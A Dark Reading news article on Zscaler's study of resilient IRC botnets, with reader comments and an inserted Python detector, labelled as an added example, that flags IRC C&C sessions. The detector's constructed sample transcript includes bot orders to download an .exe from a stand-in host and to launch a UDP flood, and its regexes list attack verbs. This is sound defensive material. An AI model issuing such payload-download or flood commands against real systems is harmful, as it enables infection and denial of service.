Dark Reading is part of the Informa Tech Division of Informa PLC



05:01 PM

IRC Botnets Are Not Quite Dead Yet

The handful that still operate are more sophisticated and resilient than before, Zscaler says.

Far from going the way of the dodo as many had surmised, Internet Relay Chat (IRC) botnets are alive and thriving.

A new study by security vendor Zscaler shows that IRC botnets, while not growing at a particularly rapid rate, continue to be active and have incorporated several new features over the years that make them as potent a threat as ever.

Zscaler’s analysis focused on four new IRC botnet families that hit the company’s cloud sandboxes worldwide in 2015: DorkBot, IRCBot.HI, RageBot and Phorpiex. Of these, DorkBot is the most prevalent, according to the company.

Though payloads from these botnets represented only a very small proportion of the new payloads seen across all known botnet families, they still pose a threat, said Zscaler research director Deepen Desai. The top five locations currently being hit by IRC botnet payloads include the USA, Germany and India.

“In this era of sophisticated botnets with multiple C&C communication channels, custom protocols, and encrypted communication, we continue to see a steady number of new IRC based botnet payloads being pushed out into the wild [regularly],” he said in an emailed comment to Dark Reading.

IRC botnets were especially prevalent in the 1990s and early to mid-2000s but have been gradually dwindling in number since then. Such a botnet is basically a collection of infected systems controlled remotely via a preconfigured IRC server and channel. While such botnets can be effective, they are also susceptible to a single point of failure: anyone who takes down the IRC server or channel, or blocks IRC communications, cuts the operator off from the bots, he said.

Back in 2007, when thousands of IRC botnets were still operating around the world, researchers found that most had a life span of just two months because of how easy they were to take down. That is why cybercriminals have moved to web-based C&C communication channels over the years, he said. But Zscaler’s analysis showed that IRC botnets have evolved as well, Desai said.

While the core C&C communication protocol that is used remains IRC, several new features have been added that make them comparable to some of the more sophisticated web-based botnets out there, he said. For example, IRC botnet operators these days use multiple servers and channels for command and control purposes, so they no longer have a single point of failure like before.

Many encrypt all IRC communication between an infected host and the C&C server. New payloads, including updated C&C information, are downloaded periodically to infected systems from preconfigured URLs, and many use anti-analysis techniques to deter automated sandboxing, Desai said.

The enhancements don’t stop there. IRC botnets use the same propagation methods as other botnets, including file injection, P2P applications, instant messaging and compromised removable drives. They are also used for many of the same purposes, including launching denial-of-service attacks, installing or uninstalling other malware payloads for a fee, and stealing user credentials and other sensitive information.
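The article describes the mechanics of IRC C&C (a preconfigured server and channel, commands pushed to bots, new payloads fetched from preconfigured URLs) but not how a defender would recognise such a session on the wire. The following is an added example, not Zscaler's or the article's code: a minimal parser for the IRC line format (`[:prefix] COMMAND params [:trailing]`) plus heuristics that score a captured client/server exchange for the traits described above. The session transcript, the bot-style nick pattern, the channel name and key, the command prefixes (`.dl`, `.udp`) and the IP addresses are all constructed for illustration; real families use their own command syntax, so the verb list and nick regex are assumptions a practitioner would tune to the family in hand.

```python
"""Heuristic detection of IRC-based botnet C&C in a captured session.

Added example (not code from the article or from Zscaler). It parses IRC
protocol lines and scores a session for the traits the article attributes
to IRC botnets: a bot-style nick, an immediate JOIN to a preconfigured
(key-protected) channel, and operator commands arriving as channel text or
topic, such as an instruction to fetch a new payload from a preconfigured URL.
All sample data below is constructed; no real C&C infrastructure is referenced.
"""
import re
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class IrcMessage:
    prefix: Optional[str]
    command: str
    params: list = field(default_factory=list)
    trailing: Optional[str] = None


def parse_irc_line(line: str) -> IrcMessage:
    """Split one IRC line into prefix, command, middle params and trailing text."""
    line = line.rstrip("\r\n")
    prefix = None
    if line.startswith(":"):                      # optional ":prefix " (sender)
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:                              # " :trailing" may contain spaces
        line, _, trailing = line.partition(" :")
    parts = line.split()
    command = parts[0].upper() if parts else ""
    return IrcMessage(prefix, command, parts[1:], trailing)


# Assumed bot-nick shape (e.g. "[USA|XP]f3a9q1"): a country/OS tag in brackets
# followed by random alphanumerics. This is an illustrative pattern, not a
# signature for any specific family.
BOT_NICK_RE = re.compile(r"^\[[A-Z]{2,3}\|[A-Za-z0-9]{1,5}\][A-Za-z0-9]{4,}$")
URL_RE = re.compile(r"https?://\S+")
# Assumed operator command syntax: a prefix character and a verb. Tune per family.
COMMAND_RE = re.compile(
    r"^[!.$](dl|download|up|update|udp|syn|ddos|stop|visit|spread|scan)\b", re.I)


def classify_text_command(text: str) -> Optional[str]:
    """Return the command verb if the channel text looks like a bot instruction."""
    m = COMMAND_RE.match(text)
    return m.group(1).lower() if m else None


def analyze_session(lines):
    """Walk a transcript of 'C: ' (client) / 'S: ' (server) lines; return findings."""
    findings = []
    for raw in lines:
        direction, _, line = raw.partition(": ")
        msg = parse_irc_line(line)
        if direction == "C" and msg.command == "NICK" and msg.params:
            if BOT_NICK_RE.match(msg.params[0]):
                findings.append(("bot_nick", msg.params[0]))
        elif direction == "C" and msg.command == "JOIN" and msg.params:
            if len(msg.params) >= 2:              # JOIN #chan key: preconfigured keyed channel
                findings.append(("keyed_join", msg.params[0]))
        elif msg.command in ("PRIVMSG", "TOPIC", "332"):   # 332 = RPL_TOPIC on join
            text = msg.trailing or ""
            verb = classify_text_command(text)
            if verb:
                url = URL_RE.search(text)         # payload/update URL pushed by the operator
                findings.append(("cmd_" + verb, url.group(0) if url else text))
    return findings


def is_likely_botnet_cc(findings) -> bool:
    """Require a bot-like identity trait AND at least one operator command."""
    tags = {tag for tag, _ in findings}
    identity = bool(tags & {"bot_nick", "keyed_join"})
    commanded = any(t.startswith("cmd_") for t in tags)
    return identity and commanded


# Constructed transcript (not a real capture). C: = infected host, S: = C&C server.
SAMPLE_SESSION = [
    "C: NICK [USA|XP]f3a9q1",
    "C: USER f3a9q1 0 * :f3a9q1",
    "S: :irc.example.invalid 001 [USA|XP]f3a9q1 :Welcome to the network",
    "C: JOIN #upd8 k3ysecret",
    "S: :irc.example.invalid 332 [USA|XP]f3a9q1 #upd8 :.dl http://198.51.100.7/u/p.exe",
    "S: :op!op@host PRIVMSG #upd8 :.udp 203.0.113.9 80 120",
    "S: :op!op@host PRIVMSG #upd8 :.dl http://198.51.100.7/u/p.exe",
]

# Constructed benign session for comparison: a human chatting on a normal channel.
BENIGN_SESSION = [
    "C: NICK alice_",
    "C: USER alice 0 * :Alice",
    "S: :irc.example.invalid 001 alice_ :Welcome to the network",
    "C: JOIN #openvms",
    "S: :bob!bob@host PRIVMSG #openvms :anyone tried the new compiler? http://example.invalid/notes",
]

if __name__ == "__main__":
    for name, session in (("sample", SAMPLE_SESSION), ("benign", BENIGN_SESSION)):
        f = analyze_session(session)
        print(name, is_likely_botnet_cc(f), f)
```

The detector is per session, so it applies unchanged whether a bot is talking to its primary server or to one of the fallback servers and channels the article mentions; what it cannot see is traffic the botnet has encrypted end to end, where the remaining signals are the connection pattern itself (unusual ports, beaconing reconnects) and the periodic payload downloads from the preconfigured URLs.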

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year ...

Joe Stanganelli (User Rank: Ninja), 4/29/2015 | 11:53:40 PM
Of course, not a lot of people think about IRC anymore...except the techies, hackers, and people active in certain communities (like reddit and 4chan).  Thanks for this important reminder that, as IRC still proliferates, so too do IRC vulnerabilities.
(User Rank: Ninja), 4/30/2015 | 5:33:13 PM
IRC Bot or Clever Geek?
The most dangerous of the IRC bots are those that have been in place for years and as far as anyone knows are some clever geek (or jerk) haunting the IRC channels.

I recall being on an OpenVMS channel for a long time and exchanging some words with a guy who I thought just had bad English. I should talk since I use Google Translate constantly to talk to people who must cringe when they see my messages fly by :-)

Long story short, turns out the geek was a bot; I was less careful back then and could basically have been owned by whomever placed the IRC bot there since I was completely convinced it was a person.

While I tend to stick to Freenode these days, I used to connect to dozens of servers, hundreds of channels. IRC is alive and well, but as noted by Joe here, lots of people don't really think about IRC anymore (like BBS) and in a way, neither do we - the regular users - since it's about as comfortable as a desk phone and the feeling of picking up the receiver after hearing a ring.

Yeah, we need to get less comfortable and more alert, for both our sake and that of our fellow IRCers.